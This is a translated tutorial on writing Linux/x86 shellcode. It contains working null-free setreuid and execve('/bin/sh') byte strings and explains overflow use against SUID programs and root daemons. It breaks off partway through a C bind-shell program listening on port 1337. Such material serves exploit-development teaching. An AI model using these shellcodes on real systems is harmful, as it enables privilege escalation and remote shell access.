Shellcodes Compiling Method

Last Update:2018-12-05 Source: Internet

Author: User

UNF & PR1 present: Writing Linux/x86 shellcodes for dum dums.

========================================================== =====
PR1 (pr10n@u-n-f.com)
ICBM@0x557.org
Thank you very much for pointing out and correcting the mistakes in the original text and translation, Thk u!
Http://www.0x557.org
Http://www.airarms.org
========================================================== =====

-----------------------------------------------------------------------------------------------
Copyright (c) February 2002, Sebastian Hegenbart (a.k.a. PR1) and UNF (United Net Frontier)
The following material is property of UNF & PR1.
Do not redistribute this article modified, and give proper credit to UNF and PR1 if you
redistribute it or if you write your own article based upon the following material.
-----------------------------------------------------------------------------------------------

1. Introduction

There are not many good articles on the Internet about how to write shellcode, and unfortunately reading them requires a solid knowledge of assembly. So in this article I will introduce you to Linux/x86 assembly and explain how to write shellcode for Linux/x86. The introduction to ASM given here is not complete; I only cover the parts that matter for writing shellcode. I will explain the code that appears in the article, but nothing can replace a good ASM book and a disassembler. :)

1.2. What is shellcode?

In short, shellcode is a sequence of CPU instructions. Why is it called shellcode? Because the first shellcodes simply spawned a shell. By now that name is rather outdated :), because there are also remote shellcodes (UDP or TCP), chroot-breaking shellcodes, shellcodes that append a line to a file, setreuid shellcodes, and so on. But since everyone calls it shellcode, I will use that word throughout the text.

1.3. What should we do with shellcode?

After we take over a process (SUID, SGID, or a daemon run by root), we usually want it to do something useful. There are many techniques, such as return-into-libc, overwriting GOT addresses, PLT infection, and exploiting .dtors. If you cannot get the task done by calling existing functions (for example, by overwriting function pointers), you may need shellcode. In the simplest case you overwrite the saved %eip with an address inside your buffer, so that execution returns into a run of NOP instructions. The CPU fetches its next instruction from the address now held in %eip. If your exploit has placed shellcode in the input buffer behind the NOPs, execution reaches the beginning of the shellcode and runs it. That way, you win!

1.4 How do I write shellcode?

Now let's get to the main part of this article. I assume you have at least some knowledge of the C language.

=- =- ==- =-=
2. Assembly

ASM is a low-level programming language, about as close to the hardware as you can program. An IA-32 CPU has a number of registers, and accessing them is much faster than accessing memory. You assign values to the registers to tell your program what to do. The most important registers are %eax, %ebx, %ecx, %edx, %esp, %ebp, %esi, %edi and %eip. Each of these 32-bit registers is 4 bytes long. You may think these register names are not very creative, but you are wrong:

# %eax is the accumulator. When a system call occurs, the kernel checks the value in %eax, which is used as the system call number (each system call provided by the kernel has its own number). You can look the numbers up in /usr/include/asm/unistd.h.

# %ebx is the base register. The first parameter we pass to a system call goes in this register.

# %ecx holds the second parameter.

# %edx holds the third parameter.

# %esp is the stack pointer; it points to the top of the current stack.

# %ebp is the base pointer; it points to the base of the current stack frame.

# %eip is the instruction pointer (the register most useful to us in a buffer overflow).

# %esi and %edi are the source index and destination index registers (you can use them to store data in your shellcode).

2.1 modify registers:

There are many instructions that modify registers. You can add a suffix to an instruction to operate on a byte, a word, or the entire register.

For example: movl, movb, movw (long, byte, word)

# mov ... moves a value (an immediate number, the content of another register, ...) into a register. In AT&T syntax (which I will use throughout the article), the source operand is on the left and the destination operand is on the right.

# inc, dec ... increment or decrement the register value.

# xor ... a bitwise operation (as are not, or, and, and neg).

xor plays a special role in shellcode.
Here are the basic rules of xor:

1 xor 0 is: 1
0 xor 0 is: 0
0 xor 1 is: 1
1 xor 1 is: 0

So a value XORed with itself is always 0 (xorl %eax, %eax leaves %eax = 0).
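
The XOR rules can be checked with a few lines of C. This is only an illustrative sketch: the function names xor32 and clear_by_xor are made up for this example, and C's ^ operator stands in for the xorl instruction.

```c
#include <assert.h>
#include <stdint.h>

/* Bitwise XOR of two 32-bit values, as xorl would compute it. */
uint32_t xor32(uint32_t a, uint32_t b)
{
    return a ^ b;
}

/* Models "xorl %reg, %reg": any value XORed with itself is 0. */
uint32_t clear_by_xor(uint32_t reg)
{
    uint32_t result = xor32(reg, reg);

    assert(result == 0);   /* holds for every possible input */
    return result;
}
```

Whatever garbage a register held before, clear_by_xor returns 0, which is why xorl %eax, %eax is the usual way to zero a register without putting a zero byte into the code.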

# leal ... (load effective address, long) loads a memory address into a register.

# int $0x80 ... a software interrupt. Put simply, it switches to kernel mode and has the kernel execute our system call.

# push, pop ... store data on the stack and read it back.

Note: You can access the high or low byte of a register's low word (%ah, %al), the low word itself (%ax), or the entire (extended) register (%eax), but there is no direct way to access the high word of a register.
In other words, registers can be accessed as bytes (%al, %bh, ...), as words (%ax, %bx, ...), or as a whole (%eax, %ebx, ...).

With this knowledge in hand, we can write some ASM code and then some shellcode.

Let's start with a hello, world :) (there is no substitute for it)

.data
message:
.string "Hello, world\n"

.text
.globl main
main:

# write(int fd, char *message, ssize_t size);

movl $0x4, %eax      # system call number 4 (write), defined in /usr/include/asm/unistd.h
movl $0x1, %ebx      # file descriptor 1 (stdout)
movl $message, %ecx  # address of the message
movl $0xd, %edx      # message length: 13 bytes, including the newline
int $0x80            # enter the kernel to perform the write

# exit(int returncode);

movl $0x1, %eax      # system call number 1 (exit)
xorl %ebx, %ebx      # %ebx = 0, the return code
int $0x80

Note: This code cannot be used as shellcode, for two reasons:
1. It relies on an absolute address (the message lives in a separately defined data segment).
2. The assembled code contains NULL bytes, which cut short the string operations that usually carry our shellcode into the target.
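
For comparison, the write call from the hello-world listing can be issued from C through the libc syscall() wrapper. This is only a sketch for readers who think more easily in C. The function name hello_via_syscall is made up for this example, and SYS_write resolves to whatever number the build target uses (4 on Linux/x86, as in the listing).

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sys/syscall.h>   /* SYS_write */
#include <unistd.h>        /* syscall() */

/* Issues write(1, message, 13) directly, mirroring the register setup:
 * system call number -> %eax, then fd, buffer, length -> %ebx, %ecx, %edx.
 * Returns the number of bytes written, or -1 on error. */
long hello_via_syscall(void)
{
    static const char message[] = "Hello, world\n";

    /* sizeof counts the terminating NUL, which we do not want to print. */
    assert(sizeof(message) - 1 == 13);
    return syscall(SYS_write, 1, message, sizeof(message) - 1);
}
```

The argument order of syscall() follows the register order described earlier: the call number first, then the first, second and third parameter.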

Don't worry! Now I will explain the whole process of making shellcode.

=- =- ==- =-=

3. Write shellcode

3.1 setreuid shellcode:

Let's start with a small and simple shellcode: setreuid(0, 0).
If the program drops its privileges (usually with seteuid(getuid())) before executing the vulnerable function, we need a setreuid or a seteuid shellcode to regain them.

The C code looks like this:

#include <stdlib.h>
#include <unistd.h>

int main(void) {

    setreuid(0, 0);
    exit(0);
}

080483b0 <main>:
80483b0: b8 46 00 00 00    movl $0x46, %eax
80483b5: bb 00 00 00 00    movl $0x0, %ebx
80483ba: b9 00 00 00 00    movl $0x0, %ecx
80483bf: cd 80             int $0x80
80483c1: 8d 76 00          lea 0x0(%esi), %esi
80483c4: 90                nop
80483c5: 90                nop
80483c6: 90                nop
80483c7: 90                nop
80483c8: 90                nop
80483c9: 90                nop
80483ca: 90                nop
80483cb: 90                nop
80483cc: 90                nop
80483cd: 90                nop
80483ce: 90                nop
80483cf: 90                nop

This is the entire main function generated by our compiler, but we only need the setreuid segment:

80483b0: b8 46 00 00 00    movl $0x46, %eax
80483b5: bb 00 00 00 00    movl $0x0, %ebx
80483ba: b9 00 00 00 00    movl $0x0, %ecx
80483bf: cd 80             int $0x80

So the setreuid shellcode looks like this:

"\xb8\x46\x00\x00\x00"
"\xbb\x00\x00\x00\x00"
"\xb9\x00\x00\x00\x00"
"\xcd\x80"

If you look at the shellcode above, you will notice that it contains more NULL bytes (\x00) than instructions. Unfortunately, we cannot use any NULL bytes in shellcode. We usually overflow a buffer in a C program, and C has no real string data type. Instead, a char pointer (char *) points to the first byte in memory, and a NULL byte marks the end of the string. Functions such as strcpy and strcat operate on such strings: they stop copying at the first NULL byte, because they take it to be the end of the string.

Therefore, when we overflow a program this way, only "\xb8\x46" of our setreuid shellcode will be copied.
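
The truncation is easy to observe in C. The sketch below copies the 17 bytes of the first setreuid listing with strcpy and reports how many arrive; the names code_with_nulls and bytes_surviving_strcpy are made up for this example, and the bytes are treated purely as data.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* The setreuid code as first disassembled: 17 bytes, most of them 0x00. */
static const char code_with_nulls[] =
    "\xb8\x46\x00\x00\x00"
    "\xbb\x00\x00\x00\x00"
    "\xb9\x00\x00\x00\x00"
    "\xcd\x80";

/* Copies the bytes the way a string function would and returns how many
 * bytes actually reached the destination. */
size_t bytes_surviving_strcpy(void)
{
    char dest[sizeof(code_with_nulls)];

    assert(sizeof(code_with_nulls) - 1 == 17);
    strcpy(dest, code_with_nulls);   /* stops at the first 0x00 */
    return strlen(dest);
}
```

Only the two bytes in front of the first zero byte survive the copy; the remaining fifteen never reach the destination buffer.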

What we need to do now is rewrite our assembly code so that the shellcode contains no NULL bytes. As you can see, these are the instructions that contain NULL bytes:

80483b0: b8 46 00 00 00    movl $0x46, %eax
80483b5: bb 00 00 00 00    movl $0x0, %ebx
80483ba: b9 00 00 00 00    movl $0x0, %ecx

We must find equivalent instructions that do not generate NULL bytes. Take the first one:

80483b0: b8 46 00 00 00    movl $0x46, %eax

This instruction is encoded as [opcode | destination] [4-byte immediate value]. Our immediate is only 0x46, so the other three bytes of the long operand are unused and are encoded as zeros.

We can write it as follows:

80483c6: 31 c0    xorl %eax, %eax
80483c8: b0 46    movb $0x46, %al

xorl clears %eax first, because we cannot know what the rest of %eax holds when we change only its low 8 bits. If the register is not cleared and the upper bits (%ah, for example) hold other values, the kernel may execute the wrong system call. The movb instruction is encoded as [opcode | register] [1-byte immediate value], so the immediate can be at most 255.
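
Why the register has to be cleared first can be modelled with plain integer arithmetic. This is a sketch, not real register access: movb_to_al and xorl_then_movb are hypothetical helper names, and a uint32_t stands in for %eax.

```c
#include <assert.h>
#include <stdint.h>

/* Models "movb $imm, %al": replace the low 8 bits, keep the upper 24. */
uint32_t movb_to_al(uint32_t eax, uint8_t imm)
{
    return (eax & 0xffffff00u) | imm;
}

/* Models "xorl %eax, %eax" followed by "movb $imm, %al". */
uint32_t xorl_then_movb(uint32_t eax, uint8_t imm)
{
    eax ^= eax;                    /* %eax is now 0 */
    eax = movb_to_al(eax, imm);
    assert(eax == imm);            /* upper bits are guaranteed clear */
    return eax;
}
```

With leftover data such as 0xdeadbe00 in the register, movb alone yields 0xdeadbe46, which is not a valid system call number, while the xorl/movb pair always yields exactly 0x46.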

The following setreuid code is logically equivalent and contains no NULL bytes:

80483b0: 31 c0    xorl %eax, %eax
80483b2: 31 db    xorl %ebx, %ebx
80483b4: 31 c9    xorl %ecx, %ecx
80483b6: b0 46    movb $0x46, %al
80483b8: cd 80    int $0x80

Here is the shellcode we can work with:

"\x31\xc0"
"\x31\xdb"
"\x31\xc9"
"\xb0\x46"
"\xcd\x80"

Besides being free of NULL bytes, good shellcode should be as small as possible. The smaller the shellcode, the more NOPs fit into the buffer, which increases the chance that a guessed return address lands on them.
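
Checking a byte sequence for NULL bytes by eye is error-prone, so a small scanner helps. The following is a minimal sketch; first_null_byte and the two array names are made up for this example, and the arrays hold the bytes of the two setreuid disassemblies shown earlier.

```c
#include <assert.h>
#include <stddef.h>

/* Returns the index of the first 0x00 byte in code[0..len), or -1 if none. */
long first_null_byte(const unsigned char *code, size_t len)
{
    assert(code != NULL);
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0x00)
            return (long)i;
    }
    return -1;
}

/* movl-based version: 17 bytes. */
const unsigned char setreuid_original[] = {
    0xb8, 0x46, 0x00, 0x00, 0x00,
    0xbb, 0x00, 0x00, 0x00, 0x00,
    0xb9, 0x00, 0x00, 0x00, 0x00,
    0xcd, 0x80
};

/* xorl/movb-based version: 10 bytes. */
const unsigned char setreuid_null_free[] = {
    0x31, 0xc0, 0x31, 0xdb, 0x31, 0xc9, 0xb0, 0x46, 0xcd, 0x80
};
```

The scanner reports index 2 for the first version and -1 for the rewritten one, which is also 7 bytes shorter.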

3.2 Making your shellcode portable:

You may not know much about the remote system, you may lack the privileges to find out more about it, or you may not have access to it at all. For these reasons, do not write shellcode that works on only one system, which means: do not use absolute addresses. The chance that a hard-coded address is correct on the target is small. Instead, shellcode is generally written with relative addresses.

E.g.: we won't write jmp 0x80483b8; we write a relative jump such as jmp 0x1a instead.
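
A relative jump or call encodes the distance from the end of the instruction to its target, so the encoded value stays the same wherever the code is loaded. The sketch below computes that distance; rel_displacement and fits_in_rel8 are hypothetical helper names, and the addresses in the usage note are arbitrary examples.

```c
#include <assert.h>
#include <stdint.h>

/* Displacement of a relative jump or call. It is measured from the END
 * of the instruction, i.e. from the address of the next instruction. */
int32_t rel_displacement(uint32_t insn_addr, uint32_t insn_len, uint32_t target)
{
    assert(insn_len > 0);
    return (int32_t)(target - (insn_addr + insn_len));
}

/* A short jump (opcode 0xeb) only has room for a signed 8-bit displacement. */
int fits_in_rel8(int32_t disp)
{
    return disp >= -128 && disp <= 127;
}
```

A 2-byte jump at 0x1000 that targets 0x101f gets the displacement 0x1d, and so does the same jump at 0xbffff000 targeting 0xbffff01f. A 5-byte call at offset 31 that targets offset 2 gets -34, which is stored as the four bytes de ff ff ff.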

3.3 get shell shellcode:

In C, getting a shell looks like this:

#include <stdio.h>
#include <unistd.h>

int main(void) {
    char *name[2];

    name[0] = "/bin/sh";
    name[1] = NULL;

    execve(name[0], name, NULL);
}

As you can see, we need a string ("/bin/sh") to tell execve what we want to run. Since absolute addresses are off limits, we must find a way to reference "/bin/sh" by a relative address.

If you know something about the Intel architecture, or CPU architecture in general, you know that the memory address of the next instruction to be executed is held in %eip, usually called the PC or program counter. When the program calls a subfunction, the address of the instruction to execute after the subfunction returns has to be stored somewhere.

On some CPUs, this return address is stored in a register:

jal addy, reg   /* jump to addy and store PC + 4 in reg */
jr reg          /* the subfunction returns by jumping to the address stored in reg */

On our Intel CISC CPU:

call sub_func   /* jump to the subfunction and push the address of the next instruction onto the stack */
ret             /* jump back to the address stored on the stack */

In other words, call pushes the address of the next instruction onto the stack.

Therefore, we can use the following trick:

call some_offset   /* pushes the address of "/bin/sh" (the next address) onto the stack */
.string "/bin/sh"

Note that the string "/bin/sh" sits in the .text (code) segment. The CPU must not execute "/bin/sh" (2f62696e2f7368) as code, because it is only a string we need, so we have to make the CPU skip over it.

Let's look at a complete example that obtains the address of "/bin/sh" while avoiding executing "/bin/sh" (2f62696e2f7368) as code.

.globl main
main:

jmp to_call
after_jmp:

popl %esi   /* the address of "/bin/sh" is now in %esi */

/* exit */
xorl %eax, %eax
incl %eax
int $0x80

to_call:
call after_jmp
.string "/bin/sh"

We jump to the call; the call pushes the address of the string and transfers control back to after_jmp, where we pop the address off the stack and exit.
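
Once the address of "/bin/sh" is in a register, an execve shellcode can build its arguments in the memory directly behind the string. The struct below is a hypothetical C view of that layout, using the offsets 0x7, 0x8 and 0xc that appear in the listing that follows; the struct and field names are made up for this example, and uint32_t is used because pointers are 4 bytes on Linux/x86.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Memory starting at the "/bin/sh" string, as the shellcode arranges it. */
struct execve_args {
    char     path[7];      /* "/bin/sh" without terminator         (+0x0) */
    char     terminator;   /* NULL byte stored behind the string   (+0x7) */
    uint32_t argv0;        /* address of path, first argv entry    (+0x8) */
    uint32_t argv1;        /* NULL pointer, ends the argv array    (+0xc) */
};

/* Total number of bytes the layout occupies. */
size_t execve_args_size(void)
{
    assert(offsetof(struct execve_args, argv0) % 4 == 0);
    return sizeof(struct execve_args);
}
```

With this layout, execve receives the address of path as its first argument, the address of argv0 as its second, and the address of argv1 as its third, so the same NULL pointer ends the argument array and serves as an empty environment.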

static char lnx_execve[] =

"\xeb\x1d"             // jmp 0x1d              /* jump to the call to get the "/bin/sh" address */
"\x5b"                 // popl %ebx             /* pop the "/bin/sh" address off the stack */
"\x31\xc0"             // xorl %eax, %eax
"\x89\x5b\x08"         // movl %ebx, 0x8(%ebx)  /* store the string address at %ebx + 0x8 */
"\x88\x43\x07"         // movb %al, 0x7(%ebx)   /* terminate the string with a NULL byte */
"\x89\x43\x0c"         // movl %eax, 0xc(%ebx)  /* terminate the argument array with NULL */
"\x8d\x4b\x08"         // leal 0x8(%ebx), %ecx  /* load the address of the argument array into %ecx */
"\x8d\x53\x0c"         // leal 0xc(%ebx), %edx  /* load the address of the NULL pointer into %edx */
"\xb0\x0b"             // movb $0xb, %al        /* system call 0xb (execve) */
"\xcd\x80"             // int $0x80
"\x31\xc0"             // xorl %eax, %eax       /* if execve fails, exit to avoid an infinite loop */
"\x21\xd8"             // andl %ebx, %eax
"\x40"                 // incl %eax
"\xcd\x80"             // int $0x80
"\xe8\xde\xff\xff\xff" // call -0x22            /* push the "/bin/sh" address and jump back to the popl */
"/bin/sh";

-= -= -=

4.0 More advanced shellcodes:

For remote overflows we need other kinds of shellcode. Spawning a local shell is not enough when we attack remotely, so our shellcode needs network capabilities. To bind a shell to a port, we could write the following:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

main(void) {
    char *exec[2];
    int fd, fd2;
    struct sockaddr_in addy;

    addy.sin_addr.s_addr = INADDR_ANY;
    addy.sin_port = htons(1337);
    addy.sin_family = AF_INET;

    exec[0] = "/bin/sh";
    exec[1] = "sh";

    fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    bind(fd, &addy, sizeof(struct sockaddr_in));
    listen(fd, 1);

    fd2 = accept(fd, NULL, 0);

    dup2(fd2, 0);
    dup2(fd2, 1);
    dup2(fd2, 2);

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.
